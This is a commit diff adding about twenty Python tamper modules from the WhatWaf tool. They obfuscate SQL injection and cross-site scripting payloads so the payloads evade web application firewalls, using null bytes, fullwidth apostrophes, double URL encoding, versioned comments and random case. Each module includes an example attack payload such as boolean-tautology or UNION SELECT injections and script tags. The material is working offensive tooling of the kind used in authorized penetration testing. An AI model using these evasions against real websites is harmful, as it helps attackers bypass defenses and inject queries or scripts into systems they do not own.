added the structure to easy white-list tampers

Author: clouedoc

.DS_Store

@@ -0,0 +1,14 @@
+__example_payload__ = "'))) AND '1'='1' ((('"
+__type__ = "hiding an apostrophe by its UTF equivalent"
+
+
+def tamper(payload, **kwargs):
+    payload = str(payload)
+    identifier = "'"
+    retval = ""
+    for char in payload:
+        if char == identifier:
+            retval += "%EF%BC%87"
+        else:
+            retval += char
+    return retval

tampers/WhatWaf_tampers/apostrephemask.py

@@ -0,0 +1,14 @@
+__example_payload__ = "' )) AND 1=1 ' OR '2'='3 --'"
+__type__ = "hiding the apostrophe by passing it with a NULL character"
+
+
+def tamper(payload, **kwargs):
+    payload = str(payload)
+    identifier = "'"
+    retval = ""
+    for char in payload:
+        if char == identifier:
+            retval += "%00%27"
+        else:
+            retval += char
+    return retval

tampers/WhatWaf_tampers/apostrephenullify.py

@@ -0,0 +1,7 @@
+__example_payload__ = "AND 1=1"
+__type__ = "appending a NULL byte to the end of the payload"
+
+
+def tamper(payload, **kwargs):
+    payload = str(payload)
+    return "{}%00".format(payload)

tampers/WhatWaf_tampers/appendnull.py

@@ -0,0 +1,14 @@
+import base64
+
+
+__example_payload__ = "<script>alert("");</script>"
+__type__ = "encoding the payload into it's base64 equivalent"
+
+
+def tamper(payload, **kwargs):
+    try:
+        payload = str(payload)
+        return base64.b64encode(payload)
+    except TypeError:
+        payload = payload.encode()
+        return base64.b64encode(payload)

tampers/WhatWaf_tampers/base64encode.py

@@ -0,0 +1,9 @@
+import re
+
+
+__example_payload__ = "' AND 1=1 OR 2=2 '"
+__description__ = "mask the booleans with their symbolic counterparts"
+
+
+def tamper(payload, **kwargs):
+    return re.sub(r"(?i)and", "%26%26", re.sub(r"(?i)or", "%7C%7C", payload))

tampers/WhatWaf_tampers/booleanmask.py

@@ -0,0 +1,25 @@
+import string
+try:
+    from urllib import quote_plus
+except ImportError:
+    from urllib.parse import quote_plus
+
+
+__example_payload__ = "<img src=x onerror=\"input\">"
+__type__ = "double URL encoding the payload characters"
+
+
+def tamper(payload, **kwargs):
+    danger_chars = string.punctuation + " "
+    extra_danger_chars = ("_", ".")
+    retval = ""
+    for char in list(payload):
+        if char not in danger_chars or char == "*":
+            retval += char
+        elif char == extra_danger_chars[0]:
+            retval += quote_plus("%5F")
+        elif char == extra_danger_chars[1]:
+            retval += quote_plus("%2E")
+        else:
+            retval += quote_plus(quote_plus(char))
+    return retval

tampers/WhatWaf_tampers/doubleurlencode.py

@@ -0,0 +1,19 @@
+import string
+
+
+__example_payload__ = 'AND 1=1,<script>alert("1,2,3,4,5);</script>'
+__type__ = "enclosing numbers into brackets"
+
+
+def tamper(payload, **kwargs):
+    payload = str(payload)
+    to_enclose = string.digits
+    if not any(i in list(payload) for i in to_enclose):
+        return payload
+    retval = ""
+    for char in payload:
+        if char in to_enclose:
+            retval += "[{}]".format(char)
+        else:
+            retval += char
+    return retval

tampers/WhatWaf_tampers/enclosebrackets.py

@@ -0,0 +1,15 @@
+__example_payload__ = """' AND 1=1 " OR 1=10 '"""
+__type__ = "escaping quotes with slashes"
+
+
+def tamper(payload, **kwargs):
+    modifier = r"\\"
+    retval = ""
+    for char in payload:
+        if char == "'":
+            retval += "{}'".format(modifier)
+        elif char == '"':
+            retval += '{}"'.format(modifier)
+        else:
+            retval += char
+    return retval

tampers/WhatWaf_tampers/escapequotes.py

@@ -0,0 +1,7 @@
+__example_payload__ = "AND 1=1"
+__type__ = "turning the payload into it's lowercase equivalent"
+
+
+def tamper(payload, **kwargs):
+    payload = str(payload)
+    return payload.lower()

tampers/WhatWaf_tampers/lowercase.py

@@ -0,0 +1,21 @@
+__example_payload__ = "SELECT FIELD FROM information_schema.tables"
+__type__ = "changing specific payload characters into their Unicode equivalent"
+
+
+def tamper(payload, **kwargs):
+    unicode_changes = {
+        '1': 'B9', '2': 'B2', '3': 'B3', 'D': 'D0',
+        'T': 'DE', 'Y': 'DD', 'a': 'AA', 'e': 'F0',
+        'o': 'BA', 't': 'FE', 'y': 'FD', '|': 'A6',
+        'd': 'D0', 'A': 'AA', 'E': 'F0', 'O': 'BA'
+    }
+    retval = ""
+    # if there's not characters in it, we'll just skip this one
+    if not any(c in payload for c in unicode_changes.keys()):
+        return payload
+    for char in payload:
+        if char in unicode_changes.keys():
+            retval += "%u00{}".format(unicode_changes[char])
+        else:
+            retval += char
+    return retval

tampers/WhatWaf_tampers/lowlevelunicodecharencode.py

@@ -0,0 +1,19 @@
+import string
+
+
+__example_payload__ = 'AND 1=1,<script>alert("1,2,3,4,5);</script>'
+__type__ = "enclosing brackets and masking an apostrophe around the character in the brackets"
+
+
+def tamper(payload, **kwargs):
+    payload = str(payload)
+    to_enclose = string.digits
+    if not any(i in payload for i in to_enclose):
+        return payload
+    retval = ""
+    for char in payload:
+        if char in to_enclose:
+            retval += "[%EF%BC%87{}%EF%BC%87]".format(char)
+        else:
+            retval += char
+    return retval

tampers/WhatWaf_tampers/maskenclosebrackets.py

@@ -0,0 +1,6 @@
+__example_payload__ = "AND 1=1"
+__type__ = "putting the payload in-between a comment with obfuscation in it"
+
+
+def tamper(payload, **kwargs):
+    return "/*!00000{}*/".format(payload)

tampers/WhatWaf_tampers/modsec.py

@@ -0,0 +1,14 @@
+__example_payload__ = "SELECT * FROM information_schema.tables"
+__type__ = "obfuscating payload by passing it between comments with obfuscation and changing spaces to comments"
+
+
+def tamper(payload, **kwargs):
+    modifier = "/**/"
+    secondary_modifier = "/*!00000{}*/"
+    retval = ""
+    for char in payload:
+        if char == " ":
+            retval += modifier
+        else:
+            retval += char
+    return secondary_modifier.format(retval)

tampers/WhatWaf_tampers/modsecspace2comment.py

@@ -0,0 +1,22 @@
+__example_payload__ = r"""&\lt' AND 1=1 ',<script>alert("test");</script>"""
+__type__ = "changing the payload characters into their HTML entities"
+
+
+def tamper(payload, **kwargs):
+    payload = str(payload)
+    retval = ""
+    skip = ";"
+    encoding_schema = {
+        " ": "&nbsp;", "<": "&lt;", ">": "&gt;",
+        "&": "&amp;", '"': "&quot;", "'": "&apos;",
+    }
+    if not any(c in payload for c in encoding_schema.keys()):
+        return payload
+    for char in payload:
+        if char in encoding_schema.keys():
+            retval += encoding_schema[char]
+        elif char not in encoding_schema.keys() and char != skip:
+            retval += char
+        else:
+            retval += char
+    return retval

tampers/WhatWaf_tampers/obfuscatebyhtmlentity.py

@@ -0,0 +1,14 @@
+__example_payload__ = "&;lt'"
+__type__ = "changing certain characters in the payload into their ordinal equivalent"
+
+
+def tamper(payload, **kwargs):
+    payload = str(payload)
+    retval = ""
+    danger_characters = "%&<>/\\;'\""
+    for char in payload:
+        if char in danger_characters:
+            retval += "%{}".format(ord(char) * 10 / 7)
+        else:
+            retval += char
+    return retval

tampers/WhatWaf_tampers/obfuscatebyordinal.py

@@ -0,0 +1,6 @@
+__example_payload__ = "' AND 1=1 '"
+__type__ = "pre-pending a NULL character at the start of the payload"
+
+
+def tamper(payload, **kwargs):
+    return "%00{}".format(payload)

tampers/WhatWaf_tampers/prependnull.py

@@ -0,0 +1,17 @@
+import random
+
+
+__example_payload__ = "AS start WHERE 1601=1601 UNION ALL SELECT NULL,NULL"
+__type__ = "changing the character case of the payload randomly with either upper or lower case"
+
+
+def tamper(payload, **kwargs):
+    payload = str(payload)
+    identifier = (1, 2)
+    retval = ""
+    for char in payload:
+        if random.choice(identifier) == 1:
+            retval += char.upper()
+        else:
+            retval += char.lower()
+    return retval

tampers/WhatWaf_tampers/randomcase.py

@@ -0,0 +1,21 @@
+import random
+import string
+
+
+__example_payload__ = "' AND 1=1 ' OR 10=11,<script>alert('');</script>"
+__type__ = "implanting random comments into the payload"
+
+
+def tamper(payload, **kwargs):
+    modifer = "/**/"
+    characters = string.ascii_letters
+    retval = ""
+    for char in payload:
+        random_chars = [random.choice(characters) for _ in range(10)]
+        if char in random_chars:
+            retval += "{}{}".format(modifer, char)
+        else:
+            retval += char
+    if modifer not in retval:
+        retval = tamper(payload, **kwargs)
+    return retval

tampers/WhatWaf_tampers/randomcomments.py

@@ -0,0 +1,20 @@
+import random
+
+
+__example_payload__ = "AND 1=1,<script>alert(\"test\");</script>"
+__type__ = "implanting random Unicode characters into the payload"
+
+
+def tamper(payload, **kwargs):
+    identifiers = range(10)
+    retval = ""
+    for char in payload:
+        modifier = random.choice(identifiers)
+        if modifier == 3:
+            retval += "%u00" + "%04x".upper() % random.randrange(0x10000)
+            retval += char
+        else:
+            retval += char
+    if retval == payload:
+        return tamper(payload, **kwargs)
+    return retval

tampers/WhatWaf_tampers/randomunicode.py

@@ -0,0 +1,13 @@
+__example_payload__ = '484029") AS xDKy WHERE 5427=5427 UNION ALL SELECT NULL,NULL'
+__type__ = "changing the spaces in the payload into a comment"
+
+
+def tamper(payload, **kwargs):
+    payload = str(payload)
+    retval = ""
+    for char in payload:
+        if char == " ":
+            retval += "/**/"
+        else:
+            retval += char
+    return retval

tampers/WhatWaf_tampers/space2comment.py

@@ -0,0 +1,13 @@
+__example_payload__ = "' AND 1=1 ORDERBY(1,2,3,4,5) '; asdf"
+__type__ = "changing the spaces in the payload into double dashes"
+
+
+def tamper(payload, **kwargs):
+    modifier = "--"
+    retval = ""
+    for char in payload:
+        if char == " ":
+            retval += modifier
+        else:
+            retval += char
+    return retval

tampers/WhatWaf_tampers/space2doubledash.py

@@ -0,0 +1,16 @@
+from lib.settings import random_string
+
+
+__example_payload__ = "' AND 1=1 OR 2=2"
+__type__ = "changing the payload spaces to obfuscated hashes with a newline"
+
+
+def tamper(payload, **kwargs):
+    modifier = "%%23{}%%0A".format(random_string())
+    retval = ""
+    for char in payload:
+        if char == " ":
+            retval += modifier
+        else:
+            retval += char
+    return retval

tampers/WhatWaf_tampers/space2hash.py

@@ -0,0 +1,24 @@
+import random
+
+
+__example_payload__ = "' AND 1=1 OR 9=10 ORDERBY(1,2,3,4,5)"
+__type__ = "change the payload spaces to a random amount of spaces obfuscated with a comment"
+
+
+def tamper(payload, **kwargs):
+    modifiers = ("/**/", "/**//**/", "/**//**//**/")
+    retval = ""
+    for char in payload:
+        num = random.choice([1, 2, 3])
+        if char != " ":
+            retval += char
+        if num == 1:
+            if char == " ":
+                retval += modifiers[0]
+        elif num == 2:
+            if char == " ":
+                retval += modifiers[1]
+        else:
+            if char == " ":
+                retval += modifiers[2]
+    return retval

tampers/WhatWaf_tampers/space2multicomment.py

@@ -0,0 +1,7 @@
+__example_payload__ = "' AND 1=1 '"
+__type__ = "changing the spaces in the payload into a NULL character"
+
+
+def tamper(payload, **kwargs):
+    modifier = "%00"
+    return str(payload).replace(" ", modifier)